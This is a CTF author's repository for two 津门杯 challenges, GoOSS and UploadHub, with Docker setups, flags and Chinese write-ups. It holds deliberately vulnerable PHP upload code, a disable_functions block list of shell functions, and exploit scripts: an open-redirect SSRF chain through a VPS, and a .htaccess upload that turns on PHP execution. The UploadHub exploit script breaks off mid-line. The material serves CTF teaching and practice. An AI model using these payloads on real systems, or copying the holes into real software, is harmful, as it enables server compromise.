├── README.md └── 津门杯 ├── .DS_Store ├── GoOSS ├── .DS_Store ├── Docker │ ├── .DS_Store │ ├── Dockerfile │ └── app │ │ ├── .DS_Store │ │ ├── flag │ │ ├── index.php │ │ ├── main │ │ └── start.sh └── Write-Up │ ├── exp.py │ └── writeup.md └── UploadHub ├── .DS_Store ├── Docker ├── .DS_Store ├── app │ ├── .DS_Store │ ├── apache2.conf │ ├── shuyu.sql │ ├── start.sh │ ├── tar.py │ └── www │ │ ├── .DS_Store │ │ ├── back.jpg │ │ ├── config.php │ │ ├── index.php │ │ └── upload │ │ └── index.html └── dockerfile └── Write-Up ├── exp.py └── writeup.md /README.md: -------------------------------------------------------------------------------- 1 | # MyCTFChanllenge 2 | 出过的CTF题目 3 | -------------------------------------------------------------------------------- /津门杯/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/.DS_Store -------------------------------------------------------------------------------- /津门杯/GoOSS/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/GoOSS/.DS_Store -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/GoOSS/Docker/.DS_Store -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.0-apache 2 | 3 | 4 | # COPY ./sources.list /etc/apt/sources.list 5 | # RUN \ 6 | # apt-get update && \ 7 | # apt-get install -y php-fpm && \ 8 | # apt-get install -y nginx && \ 9 | # apt-get install -y vim && \ 10 | 
# apt-get install -y curl 11 | 12 | # COPY ./default /etc/nginx/sites-available/default 13 | # COPY ./nginx.conf /etc/nginx/nginx.conf 14 | 15 | # 添加启动脚本 16 | COPY ./app/index.php /var/www/html/index.php 17 | COPY ./app/flag /flag 18 | COPY ./app/main /opt/main 19 | COPY ./app/start.sh /start.sh 20 | 21 | RUN chmod 755 /flag 22 | RUN mkdir /var/www/html/files 23 | CMD ["bash","/start.sh"] 24 | -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/app/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/GoOSS/Docker/app/.DS_Store -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/app/flag: -------------------------------------------------------------------------------- 1 | flag{30e308e8e7122579b8ea2fae774d1999} -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/app/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/app/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/GoOSS/Docker/app/main -------------------------------------------------------------------------------- /津门杯/GoOSS/Docker/app/start.sh: -------------------------------------------------------------------------------- 1 | service apache2 start && /opt/main -------------------------------------------------------------------------------- /津门杯/GoOSS/Write-Up/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | # challenge url 4 | url = "http://122.112.246.208:20002/vul" 5 | session = 
requests.Session() 6 | 7 | rawBody = "{\"url\":\"http://127.0.0.1:1234//114.116.44.23/..\"}" 8 | headers = {"Content-Type":"application/json"} 9 | 10 | response = session.post(url, data=rawBody, headers=headers) 11 | 12 | print("Status code: %i" % response.status_code) 13 | print("Response body: %s" % response.content) 14 | 15 | -------------------------------------------------------------------------------- /津门杯/GoOSS/Write-Up/writeup.md: -------------------------------------------------------------------------------- 1 | ## this is a writeup 2 | 3 | 4 | http.Dir("/dir").Open() 5 | 可以打开文件或者目录;如果 Open 函数的参数为 . 或者 ..,返回的对象也会被认为是一个目录 6 | 7 | 于是我们可以根据fileMidderware中的内容,传入 8 | GET //www.com/.. HTTP/1.1 9 | 10 | 第56行代码判断 .. 为路径且不以 / 结尾,所以返回302,Location 为 //www.com/../;该值以 // 开头,会被客户端当作协议相对 URL 解析,从而造成任意302跳转 11 | 12 | 再配合vul控制器的ssrf,即可攻击url 13 | 虽然我们无法输入url参数,但302不限次数,先跳到自己的vps,再302到带参数的内网地址即可获取flag 14 | 15 | index.php(vps) 16 | ```php 17 | 21 | ``` 22 | 23 | 请求http://challenge.ip:port//vps.ip/.. 即可(用burp,有些浏览器会自动删除..) -------------------------------------------------------------------------------- /津门杯/UploadHub/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/.DS_Store -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/Docker/.DS_Store -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/Docker/app/.DS_Store
-------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/apache2.conf: -------------------------------------------------------------------------------- 1 | # This is the main Apache server configuration file. It contains the 2 | # configuration directives that give the server its instructions. 3 | # See http://httpd.apache.org/docs/2.4/ for detailed information about 4 | # the directives and /usr/share/doc/apache2/README.Debian about Debian specific 5 | # hints. 6 | # 7 | # 8 | # Summary of how the Apache 2 configuration works in Debian: 9 | # The Apache 2 web server configuration in Debian is quite different to 10 | # upstream's suggested way to configure the web server. This is because Debian's 11 | # default Apache2 installation attempts to make adding and removing modules, 12 | # virtual hosts, and extra configuration directives as flexible as possible, in 13 | # order to make automating the changes and administering the server as easy as 14 | # possible. 15 | 16 | # It is split into several files forming the configuration hierarchy outlined 17 | # below, all located in the /etc/apache2/ directory: 18 | # 19 | # /etc/apache2/ 20 | # |-- apache2.conf 21 | # | `-- ports.conf 22 | # |-- mods-enabled 23 | # | |-- *.load 24 | # | `-- *.conf 25 | # |-- conf-enabled 26 | # | `-- *.conf 27 | # `-- sites-enabled 28 | # `-- *.conf 29 | # 30 | # 31 | # * apache2.conf is the main configuration file (this file). It puts the pieces 32 | # together by including all remaining configuration files when starting up the 33 | # web server. 34 | # 35 | # * ports.conf is always included from the main configuration file. It is 36 | # supposed to determine listening ports for incoming connections which can be 37 | # customized anytime. 
38 | # 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ 40 | # directories contain particular configuration snippets which manage modules, 41 | # global configuration fragments, or virtual host configurations, 42 | # respectively. 43 | # 44 | # They are activated by symlinking available configuration files from their 45 | # respective *-available/ counterparts. These should be managed by using our 46 | # helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See 47 | # their respective man pages for detailed information. 48 | # 49 | # * The binary is called apache2. Due to the use of environment variables, in 50 | # the default configuration, apache2 needs to be started/stopped with 51 | # /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not 52 | # work with the default configuration. 53 | 54 | 55 | # Global configuration 56 | # 57 | 58 | # 59 | # ServerRoot: The top of the directory tree under which the server's 60 | # configuration, error, and log files are kept. 61 | # 62 | # NOTE! If you intend to place this on an NFS (or otherwise network) 63 | # mounted filesystem then please read the Mutex documentation (available 64 | # at ); 65 | # you will save yourself a lot of trouble. 66 | # 67 | # Do NOT add a slash at the end of the directory path. 68 | # 69 | #ServerRoot "/etc/apache2" 70 | 71 | # 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. 73 | # 74 | #Mutex file:${APACHE_LOCK_DIR} default 75 | 76 | # 77 | # The directory where shm and other runtime files will be stored. 78 | # 79 | 80 | DefaultRuntimeDir ${APACHE_RUN_DIR} 81 | 82 | # 83 | # PidFile: The file in which the server should record its process 84 | # identification number when it starts. 85 | # This needs to be set in /etc/apache2/envvars 86 | # 87 | PidFile ${APACHE_PID_FILE} 88 | 89 | # 90 | # Timeout: The number of seconds before receives and sends time out. 
91 | # 92 | Timeout 300 93 | 94 | # 95 | # KeepAlive: Whether or not to allow persistent connections (more than 96 | # one request per connection). Set to "Off" to deactivate. 97 | # 98 | KeepAlive On 99 | 100 | # 101 | # MaxKeepAliveRequests: The maximum number of requests to allow 102 | # during a persistent connection. Set to 0 to allow an unlimited amount. 103 | # We recommend you leave this number high, for maximum performance. 104 | # 105 | MaxKeepAliveRequests 100 106 | 107 | # 108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the 109 | # same client on the same connection. 110 | # 111 | KeepAliveTimeout 5 112 | 113 | 114 | # These need to be set in /etc/apache2/envvars 115 | User ${APACHE_RUN_USER} 116 | Group ${APACHE_RUN_GROUP} 117 | 118 | # 119 | # HostnameLookups: Log the names of clients or just their IP addresses 120 | # e.g., www.apache.org (on) or 204.62.129.132 (off). 121 | # The default is off because it'd be overall better for the net if people 122 | # had to knowingly turn this feature on, since enabling it means that 123 | # each client request will result in AT LEAST one lookup request to the 124 | # nameserver. 125 | # 126 | HostnameLookups Off 127 | 128 | # ErrorLog: The location of the error log file. 129 | # If you do not specify an ErrorLog directive within a 130 | # container, error messages relating to that virtual host will be 131 | # logged here. If you *do* define an error logfile for a 132 | # container, that host's errors will be logged there and not here. 133 | # 134 | ErrorLog ${APACHE_LOG_DIR}/error.log 135 | 136 | # 137 | # LogLevel: Control the severity of messages logged to the error_log. 138 | # Available values: trace8, ..., trace1, debug, info, notice, warn, 139 | # error, crit, alert, emerg. 140 | # It is also possible to configure the log level for particular modules, e.g. 
141 | # "LogLevel info ssl:warn" 142 | # 143 | LogLevel warn 144 | 145 | # Include module configuration: 146 | IncludeOptional mods-enabled/*.load 147 | IncludeOptional mods-enabled/*.conf 148 | 149 | # Include list of ports to listen on 150 | Include ports.conf 151 | 152 | 153 | # Sets the default security model of the Apache2 HTTPD server. It does 154 | # not allow access to the root filesystem outside of /usr/share and /var/www. 155 | # The former is used by web applications packaged in Debian, 156 | # the latter may be used for local directories served by the web server. If 157 | # your system is serving content from a sub-directory in /srv you must allow 158 | # access here, or in any related virtual host. 159 | 160 | Options FollowSymLinks 161 | AllowOverride None 162 | Require all denied 163 | 164 | 165 | 166 | AllowOverride None 167 | Require all granted 168 | 169 | 170 | 171 | Options Indexes FollowSymLinks 172 | AllowOverride All 173 | Require all granted 174 | 175 | 176 | php_flag engine off 177 | 178 | # 179 | # Options Indexes FollowSymLinks 180 | # AllowOverride None 181 | # Require all granted 182 | # 183 | 184 | 185 | 186 | 187 | # AccessFileName: The name of the file to look for in each directory 188 | # for additional configuration directives. See also the AllowOverride 189 | # directive. 190 | # 191 | AccessFileName .htaccess 192 | 193 | # 194 | # The following lines prevent .htaccess and .htpasswd files from being 195 | # viewed by Web clients. 196 | # 197 | 198 | Require all denied 199 | 200 | 201 | 202 | # 203 | # The following directives define some format nicknames for use with 204 | # a CustomLog directive. 205 | # 206 | # These deviate from the Common Log Format definitions in that they use %O 207 | # (the actual bytes sent including headers) instead of %b (the size of the 208 | # requested file), because the latter makes it impossible to detect partial 209 | # requests. 
210 | # 211 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. 212 | # Use mod_remoteip instead. 213 | # 214 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 215 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 216 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 217 | LogFormat "%{Referer}i -> %U" referer 218 | LogFormat "%{User-agent}i" agent 219 | 220 | # Include of directories ignores editors' and dpkg's backup files, 221 | # see README.Debian for details. 222 | 223 | # Include generic snippets of statements 224 | IncludeOptional conf-enabled/*.conf 225 | 226 | # Include the virtual host configurations: 227 | IncludeOptional sites-enabled/*.conf 228 | 229 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 230 | ServerName 127.0.0.1 -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/shuyu.sql: -------------------------------------------------------------------------------- 1 | -- phpMyAdmin SQL Dump 2 | -- version 4.9.2 3 | -- https://www.phpmyadmin.net/ 4 | -- 5 | -- 主机: 127.0.0.1:3306 6 | -- 生成日期: 2020-06-21 15:07:30 7 | -- 服务器版本: 5.7.28 8 | -- PHP 版本: 5.6.40 9 | 10 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; 11 | SET AUTOCOMMIT = 0; 12 | START TRANSACTION; 13 | SET time_zone = "+00:00"; 14 | 15 | 16 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; 17 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; 18 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; 19 | /*!40101 SET NAMES utf8mb4 */; 20 | 21 | -- 22 | -- 数据库: `shuyu` 23 | -- 24 | 25 | -- -------------------------------------------------------- 26 | 27 | -- 28 | -- 表的结构 `img` 29 | -- 30 | 31 | DROP TABLE IF EXISTS `img`; 32 | CREATE TABLE IF NOT EXISTS `img` ( 33 | `id` int(11) NOT NULL AUTO_INCREMENT, 34 | `filename` varchar(200) NOT NULL, 35 | PRIMARY KEY (`id`) 36 | ) ENGINE=MyISAM DEFAULT 
CHARSET=utf8; 37 | COMMIT; 38 | 39 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; 40 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; 41 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; 42 | -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | find /var/lib/mysql -type f -exec touch {} \; && service mysql start 4 | /etc/init.d/apache2 start 5 | cron 6 | echo "* * * * * /bin/sh -c 'rm -rf /var/www/html/upload/*'" | crontab 7 | /bin/bash 8 | tail -f /dev/null 9 | -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/tar.py: -------------------------------------------------------------------------------- 1 | import tarfile 2 | import sys 3 | tar = tarfile.open(sys.argv[1], "r") 4 | tar.extractall() -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/www/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/Docker/app/www/.DS_Store -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/www/back.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/Docker/app/www/back.jpg -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/www/config.php: -------------------------------------------------------------------------------- 1 | $value) { 8 | $value= str_ireplace('\'','',$value); 9 | $value= str_ireplace('"','',$value); 10 | $value= 
str_ireplace('union','',$value); 11 | $value= str_ireplace('select','',$value); 12 | $value= str_ireplace('from','',$value); 13 | $value= str_ireplace('or','',$value); 14 | $_GET[$key] =$value; 15 | } 16 | ?> -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/www/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 生而为人,我很抱歉 4 | 5 | 6 | 7 |

电影太仁慈,总能让错过的人重新相遇;生活不一样,有的人说过再见就再也不见了 -网易云

8 | 9 |
11 | 12 | 13 | 14 |
15 | 16 | 17 | 0 && !in_array($fileext,$type) && $_FILES["file"]["size"] > 204800){ 30 | die('upload error'); 31 | }else{ 32 | 33 | $filename=addslashes($_FILES['file']['name']); 34 | $sql="insert into img (filename) values ('$filename')"; 35 | $conn->query($sql); 36 | 37 | $sql="select id from img where filename='$filename'"; 38 | $result=$conn->query($sql); 39 | 40 | if ($result->num_rows > 0) { 41 | while($row = $result->fetch_assoc()) { 42 | $id=$row["id"]; 43 | } 44 | 45 | move_uploaded_file($_FILES["file"]["tmp_name"],$upload.'/'.$filename); 46 | header("Location: index.php?id=$id"); 47 | } 48 | } 49 | } 50 | 51 | elseif (isset($_GET['id'])){ 52 | $id=intval($_GET['id']); 53 | $sql="select filename from img where id=$id"; 54 | $result=$conn->query($sql); 55 | if ($result->num_rows > 0) { 56 | while($row = $result->fetch_assoc()) { 57 | $filename=$row["filename"]; 58 | } 59 | $img=$upload.'/'.$filename; 60 | echo ""; 61 | } 62 | } 63 | 64 | 65 | ?> 66 | 74 | 75 | -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/app/www/upload/index.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ev0A/MyCTFChallenge/13160b02544a1039dbe8be0c788a267802d15220/津门杯/UploadHub/Docker/app/www/upload/index.html -------------------------------------------------------------------------------- /津门杯/UploadHub/Docker/dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:14.04 2 | 3 | #ENV DEBIAN_FRONTEND noninteractive 4 | RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list 5 | RUN sed -i 's/security.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list 6 | 7 | RUN apt-get update -y 8 | 9 | # install http 10 | RUN apt-get install -y apache2 11 | RUN mkdir -p /var/lock/apache2 /var/run/apache2 12 | 13 | RUN apt-get update && apt-get install -y libapache2-mod-php5 php5 php5-mysql 
mysql-server python3 python3-pip 14 | COPY app/www /var/www/html 15 | COPY app/shuyu.sql /root/shuyu.sql 16 | COPY app/start.sh /root/start.sh 17 | COPY app/apache2.conf /etc/apache2/apache2.conf 18 | COPY app/tar.py /tar.py 19 | 20 | RUN sed -i "315c disable_functions = error_log,mb_send_mail,imap_mail,system,unlink,rmdir,shell_exec,exec,putenv,mail,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,passthru,proc_open,popen,pcntl_exec,posix_mkfifo, pg_lo_import, dbmopen, dbase_open, popen, chgrp, chown, chmod, symlink,apache_setenv,define_syslog_variables, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_uname, proc_close, pclose, proc_nice, proc_terminate,curl_exec,curl_multi_exec,parse_ini_file,show_source,imap_open,imagecolormatch,fopen,copy,rename,readlink,tmpfile,tempnam,touch,link,file,ftp_connect,ftp_ssl_connect," /etc/php5/apache2/php.ini 21 | RUN sed -i '$a\ServerName 127.0.0.1' /etc/apache2/apache2.conf &&\ 22 | chmod -R 755 /var/www/html &&\ 23 | chmod -R 777 /var/www/html/upload&&\ 24 | rm /var/www/html/index.html&&\ 25 | chmod +x /root/start.sh 26 | 27 | 28 | RUN sed -i "N;32a\secure_file_priv=/tmp" /etc/mysql/my.cnf&&\ 29 | find /var/lib/mysql -type f -exec touch {} \; && service mysql start&&\ 30 | mysqladmin -u root password "root"&&\ 31 | mysql -u root -proot -e "create database shuyu;"&&\ 32 | mysql -u root -proot shuyu < /root/shuyu.sql 33 | 34 | RUN echo flag{e3a5fa12f003a831a9e077b9a7c46a4d}>/flag 35 | 36 | EXPOSE 80 37 | 38 | CMD ["/root/start.sh"] 39 | -------------------------------------------------------------------------------- /津门杯/UploadHub/Write-Up/exp.py: 
-------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | # challenge url 4 | url = "http://127.0.0.1:8000" 5 | 6 | 7 | 8 | 9 | 10 | session = requests.Session() 11 | 12 | paramsGet = {"id":"1"} 13 | paramsPost = {"submit":"submit"} 14 | paramsMultipart = [('file', ('.htaccess', "\r\nForceType application/x-httpd-php\r\nSetHandler application/x-httpd-php\r\nRequire all granted\r\nphp_flag engine on\r\n\r\nphp_value auto_prepend_fi\\\r\nle .htaccess\r\n\x23", 'application/octet-stream'))] 15 | 16 | response = session.post(url, data=paramsPost, files=paramsMultipart, params=paramsGet,allow_redirects=False) 17 | 18 | # print("Status code: %i" % response.status_code) 19 | # print("Response body: %s" % response.content) 20 | 21 | location = response.headers['Location'] if response.status_code == 302 else None 22 | print(location) 23 | 24 | response = session.get(url+"/"+location) 25 | 26 | exp_url = re.search(r"